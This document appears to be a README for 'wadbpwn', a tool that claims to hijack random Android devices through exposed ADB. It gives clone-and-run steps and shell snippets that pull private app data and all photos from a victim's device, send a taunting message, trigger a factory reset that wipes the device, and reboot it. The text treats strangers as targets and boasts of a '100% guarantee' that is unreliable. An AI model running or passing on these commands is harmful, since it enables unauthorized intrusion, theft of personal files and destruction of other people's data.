It's true - We can takeover a device within seconds and get a proxy or steal anything or whatever!
Hack random android device with 100% guarantee to succeed within 1 second.
git clone https://github.com/wuseman/wadbpwn
cd wadbpwn
chmod +x wadb*
bash ./wadbpwn.sh
- Wait ~1 second
Target has been pwned!
- Enjoy ;-)
Install any linux distro from microsoft store and run commands above..
which su &> /dev/null
if [[ $? -eq "0" ]]; then
adb pull /data/data/ /some/path
else
printf "* No root detected, just try another target..\n"
exit 1
fi
A simple example:
PICS="$(adb shell 'su -c find / \( -name '*.png' -name '*.jpg*' \)')"
for pictures in $PICS; do
adb pull -p $PICS /some/folder
done
printf "Done..is it your lucky day? ;-)\n"
adb shell am broadcast -a com.google.android.c2dm.intent.RECEIVE -n <your.app.package>/com.google.android.gms.gcm.GcmReceiver --es "You h4v3 b33n h3cked mat3" "hrhr!"
adb shell am broadcast -a android.intent.action.MASTER_CLEAR
adb shell reboot
This project is licensed under the GNU General Public License v3.0 - see the LICENSE.md file for details